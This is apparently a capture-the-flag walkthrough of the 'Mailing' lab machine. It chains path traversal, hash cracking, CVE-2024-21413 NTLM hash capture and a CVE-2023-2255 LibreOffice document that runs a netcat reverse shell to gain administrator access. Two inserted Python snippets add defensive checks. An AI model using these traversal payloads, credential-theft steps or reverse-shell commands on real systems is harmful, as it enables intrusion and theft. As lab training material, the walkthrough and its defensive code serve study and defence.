Proof of Concept
10.129.232.39
Nmap
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
5985/tcp open wsman

Initial Access
The Nmap script scan results show that the host is running hMailServer.
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Accessing the web service on port 80 redirects to http://mailing.htb.
┌──(kali㉿kali)-[~/Mailing]
└─$ curl http://10.129.232.39
<head><title>Documento movido</title></head>
<body><h1>Objeto movido</h1>Este documento puede encontrarse aquí <a HREF="http://mailing.htb"></a></body>

After visiting http://mailing.htb, clicking the "Download Instructions" button downloads a PDF file.
Modifying the file parameter confirms a Path Traversal vulnerability.
┌──(kali㉿kali)-[~/Mailing]
└─$ curl http://mailing.htb/download.php?file=../../../../../../../Windows/System32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
<SNIP>
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htb

Using the Path Traversal vulnerability, the hMailServer configuration file is read.
- Two password hashes found
- 841bb5acfa6779ae432fd7a4e6600ba7
- 0a9f8ad8bf896b501dde74f08efd7e4c
┌──(kali㉿kali)-[~/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../../../Program%20Files%20%28x86%29/hMailServer/Bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Cracking the hash yields the plaintext password.
- homenetworkingadministrator
┌──(kali㉿kali)-[~/Mailing]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --quiet
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
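The download.php traversal above succeeds because the file parameter is joined to a base directory without being confined to it. The following is an added defensive example, not code from the writeup or from the target's PHP: the check a download handler should perform, written in Python, with the base directory /srv/www/files as an assumed value. The two rejected inputs are the exact values requested above.

```python
import os
import urllib.parse


def resolve_download(base_dir: str, requested: str):
    """Return the absolute path to serve, or None if `requested` escapes base_dir.

    base_dir is the only directory downloads may come from (an assumed value in
    the usage below); `requested` is the raw value of the `file` parameter.
    """
    # Decode once, as the web server does before the parameter reaches the script,
    # so "Program%20Files%20%28x86%29" is checked in its decoded form.
    name = urllib.parse.unquote(requested)
    # Windows accepts both separators, so "..\\.." must not slip past a check
    # that only knows "/".
    name = name.replace("\\", "/")
    # Reject empty names, NUL bytes, absolute paths and drive-letter prefixes
    # outright (the drive-letter check is only effective when run on Windows).
    if not name or "\x00" in name or os.path.isabs(name) or os.path.splitdrive(name)[0]:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # After normalisation the target must still sit inside base_dir, and must
    # not be base_dir itself.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_safe_download(base_dir: str, requested: str) -> bool:
    """True when the request stays within base_dir."""
    return resolve_download(base_dir, requested) is not None


if __name__ == "__main__":
    BASE = "/srv/www/files"  # assumed download directory
    for req in ("instructions.pdf",
                "../../../../../../../Windows/System32/drivers/etc/hosts",
                "../../../../../../../Program%20Files%20%28x86%29/hMailServer/Bin/hMailServer.ini"):
        print(f"{req!r} -> {'serve' if is_safe_download(BASE, req) else 'reject'}")
```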
Logging in to IMAP as administrator@mailing.htb:homenetworkingadministrator succeeds, but the mailbox contains no mail.
┌──(kali㉿kali)-[~/Mailing]
└─$ telnet 10.129.232.39 143
Trying 10.129.232.39...
Connected to 10.129.232.39.
Escape character is '^]'.
* OK IMAPrev1
1 LOGIN administrator@mailing.htb homenetworkingadministrator
1 OK LOGIN completed
1 LIST "" *
* LIST (\HasNoChildren) "." "INBOX"
1 OK LIST completed
1 SELECT INBOX
* 0 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Seen \Draft \Answered \Flagged)
* OK [UIDVALIDITY 1709316818] current uidvalidity
* OK [UIDNEXT 1] next uid
* OK [PERMANENTFLAGS (\Deleted \Seen \Draft \Answered \Flagged)] limited
1 OK [READ-WRITE] SELECT completed

A vulnerability is found that allows local NTLM credentials to be stolen via a crafted link (CVE-2024-21413).
Download the PoC
┌──(kali㉿kali)-[~/Mailing]
└─$ git clone https://github.com/CMNatic/CVE-2024-21413.git
Cloning into 'CVE-2024-21413'...
remote: Enumerating objects: 73, done.
remote: Counting objects: 100% (73/73), done.
remote: Compressing objects: 100% (61/61), done.
remote: Total 73 (delta 38), reused 32 (delta 10), pack-reused 0 (from 0)
Receiving objects: 100% (73/73), 246.52 KiB | 3.38 MiB/s, done.
Resolving deltas: 100% (38/38), done.

In the PoC's exploit.py, change the sender, recipient and server address. The recipient used for this test is the user "maya", who is listed on the http://mailing.htb homepage.
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender_email = 'administrator@mailing.htb' # Replace with your sender email address
receiver_email = 'maya@mailing.htb' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
<SNIP>
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)
server = smtplib.SMTP('10.129.232.39', 25)
server.ehlo()

Run the PoC
┌──(kali㉿kali)-[~/Mailing/CVE-2024-21413]
└─$ python exploit.py
Enter your attacker email password: homenetworkingadministrator
Email delivered

After starting responder and waiting, the NTLMv2 hash of user maya can be captured.
┌──(kali㉿kali)-[~/Mailing/CVE-2024-21413]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
<SNIP>
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.232.39
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:0f70efd28447e8d<SNIP>
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya

Cracking the NTLMv2-SSP hash yields the plaintext password.
- maya:m4y4ngs4ri
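The mail-borne credential leak above depends on the recipient's client following a link that points at a remote file share. As an added defensive example, not part of the writeup or the PoC, the following scans the HTML parts of a raw message for links using the file: scheme or a raw UNC path, the check a mail gateway or SOC triage script can use to quarantine such messages; the sample message and the ATTACKER_HOST placeholder are constructed.

```python
import re
from email import message_from_string
from html.parser import HTMLParser


class _HrefCollector(HTMLParser):
    """Collects href values from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value)


# A link that sends a mail client to a file share: the file: scheme or a raw
# UNC path. Leading whitespace and case are ignored because clients tolerate both.
_SHARE_LINK = re.compile(r"^\s*(file:|\\\\[^\\]+\\)", re.IGNORECASE)


def suspicious_links(raw_message: str) -> list:
    """Return hrefs from the message's text/html parts that point at a file share."""
    msg = message_from_string(raw_message)
    parts = msg.walk() if msg.is_multipart() else [msg]
    hits = []
    for part in parts:
        if part.get_content_type() != "text/html":
            continue
        collector = _HrefCollector()
        collector.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        hits.extend(h for h in collector.hrefs if _SHARE_LINK.search(h))
    return hits


# Constructed sample message; ATTACKER_HOST is a placeholder, not a real host.
SAMPLE_MAIL = """\
From: administrator@mailing.htb
To: maya@mailing.htb
Subject: Test
Content-Type: text/html; charset="utf-8"

<html><body><a href="https://mailing.htb/docs">docs</a>
<a href="file://ATTACKER_HOST/share/review.txt">review</a></body></html>
"""

if __name__ == "__main__":
    print(suspicious_links(SAMPLE_MAIL))  # flags only the file:// link
```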
┌──(kali㉿kali)-[~/Mailing]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
MAYA::MAILING:0f70efd28447e8d7:28f4e61e3ad20f01bbf0ca197ffce5a2:<SNIP>:m4y4ngs4ri

WinRM login succeeds with the recovered credentials for maya.
┌──(kali㉿kali)-[~/Mailing]
└─$ evil-winrm -i 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents>

Read user.txt
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
bcb1cec3b74e6092c98da2a679cb77ec
*Evil-WinRM* PS C:\Users\maya\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::384d:3ea1:4d96:f98a
Temporary IPv6 Address. . . . . . : dead:beef::9927:4950:6f2e:6588
Link-local IPv6 Address . . . . . : fe80::5969:93e6:fc58:aa7f%14
IPv4 Address. . . . . . . . . . . : 10.129.232.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%14
10.129.0.1

Privilege Escalation
SMB authentication succeeds as user maya.
┌──(kali㉿kali)-[~/Mailing]
└─$ nxc smb 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
SMB 10.129.232.39 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.232.39 445 MAILING [+] MAILING\maya:m4y4ngs4ri

The user has READ and WRITE permission on the "Important Documents" SMB share.
┌──(kali㉿kali)-[~/Mailing]
└─$ nxc smb 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri' --shares
SMB 10.129.232.39 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.232.39 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.232.39 445 MAILING [*] Enumerated shares
SMB 10.129.232.39 445 MAILING Share Permissions Remark
SMB 10.129.232.39 445 MAILING ----- ----------- ------
SMB 10.129.232.39 445 MAILING ADMIN$ Admin remota
SMB 10.129.232.39 445 MAILING C$ Recurso predeterminado
SMB 10.129.232.39 445 MAILING Important Documents READ,WRITE
SMB 10.129.232.39 445 MAILING IPC$ READ IPC remota

This SMB share is located at "C:\Important Documents" on the target machine.
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/22/2025 4:36 PM cleanup
d----- 2/4/2026 4:19 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroo

WinPEAS shows that LibreOffice is installed on the target machine.
Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\Archivos comunes
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\dotnet
C:\Program Files\Git
C:\Program Files\Internet Explorer
C:\Program Files\LibreOffice
C:\Program Files\Microsoft Update Health Tools
C:\Program Files\ModifiableWindowsApps
C:\Program Files\MSBuild
C:\Program Files\OpenSSL-Win64
C:\Program Files\PackageManagement
C:\Program Files\Reference Assemblies
C:\Program Files\RUXIM
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\Windows NT
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
C:\Windows\System32

The LibreOffice version is read from C:\Program Files\LibreOffice\program\version.ini.
- 7.4.0.1
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> type version.ini
[Version]
AllLanguages=en-US af am ar as ast be bg bn bn-IN bo br brx bs ca ca-valencia ckb cs cy da de dgo dsb dz el en-GB en-ZA eo es et eu fa fi fr fur fy ga gd gl gu gug he hsb hi hr hu id is it ja ka kab kk km kmr-Latn kn ko kok ks lb lo lt lv mai mk ml mn mni mr my nb ne nl nn nr nso oc om or pa-IN pl pt pt-BR ro ru rw sa-IN sat sd sr-Latn si sid sk sl sq sr ss st sv sw-TZ szl ta te tg th tn tr ts tt ug uk uz ve vec vi xh zh-CN zh-TW zu
buildid=43e5fcfbbadd18fccee5a6f42ddd533e40151bcf
ExtensionUpdateURL=https://updateexte.libreoffice.org/ExtensionUpdateService/check.Update
MsiProductVersion=7.4.0.1
ProductCode={A3C6520A-E485-47EE-98CC-32D6BB0529E4}
ReferenceOOoMajorMinor=4.1
UpdateChannel=
UpdateID=LibreOffice_7_en-US_af_am_ar_as_ast_be_bg_bn_bn-IN_bo_br_brx_bs_ca_ca-valencia_ckb_cs_cy_da_de_dgo_dsb_dz_el_en-GB_en-ZA_eo_es_et_eu_fa_fi_fr_fur_fy_ga_gd_gl_gu_gug_he_hsb_hi_hr_hu_id_is_it_ja_ka_kab_kk_km_kmr-Latn_kn_ko_kok_ks_lb_lo_lt_lv_mai_mk_ml_mn_mni_mr_my_nb_ne_nl_nn_nr_nso_oc_om_or_pa-IN_pl_pt_pt-BR_ro_ru_rw_sa-IN_sat_sd_sr-Latn_si_sid_sk_sl_sq_sr_ss_st_sv_sw-TZ_szl_ta_te_tg_th_tn_tr_ts_tt_ug_uk_uz_ve_vec_vi_xh_zh-CN_zh-TW_zu
UpdateURL=https://update.libreoffice.org/check.php
UpgradeCode={4B17E523-5D91-4E69-BD96-7FD81CFA81BB}
UpdateUserAgent=<PRODUCT> (${buildid}; ${_OS}; ${_ARCH}; <OPTIONAL_OS_HW_DATA>)
Vendor=The Document Foundation

LibreOffice 7.4.0.1 is affected by a known vulnerability (CVE-2023-2255).
Download the PoC
┌──(kali㉿kali)-[~/Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 4.24 MiB/s, done.
Resolving deltas: 100% (2/2), done.

Run the PoC to generate exploit.odt, which attempts a reverse shell connection back to the Kali Linux machine.
┌──(kali㉿kali)-[~/Mailing/CVE-2023-2255]
└─$ python CVE-2023-2255.py --cmd 'cmd.exe /c C:\ProgramData\nc64.exe 10.10.14.17 4444 -e cmd.exe' --output 'exploit.odt'
File exploit.odt has been created !

Upload exploit.odt to the "Important Documents" directory.
*Evil-WinRM* PS C:\Important Documents> upload exploit.odt
Info: Uploading /home/kali/Mailing/exploit.odt to C:\Important Documents\exploit.odt
Data: 40744 bytes of 40744 bytes copied
Info: Upload successful!

Also upload the nc64.exe binary to "C:\ProgramData".
*Evil-WinRM* PS C:\ProgramData> upload ../Tools/nc64.exe
Info: Uploading /home/kali/Mailing/../Tools/nc64.exe to C:\ProgramData\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!

Start the nc listener and wait a moment; a reverse shell running as the administrator connects.
┌──(kali㉿kali)-[~/Mailing]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.232.39] 49494
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>

Read root.txt
C:\Users\localadmin\Desktop>type root.txt
type root.txt
330d70c27ecc825bd9fdedfb84f01627
C:\Users\localadmin\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::10b
IPv6 Address. . . . . . . . . . . : dead:beef::9ea5:735f:c839:473c
Temporary IPv6 Address. . . . . . : dead:beef::e0ca:469b:b883:c918
Link-local IPv6 Address . . . . . : fe80::9e42:78f4:b8f9:c94c%14
IPv4 Address. . . . . . . . . . . : 10.129.232.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%14
10.129.0.1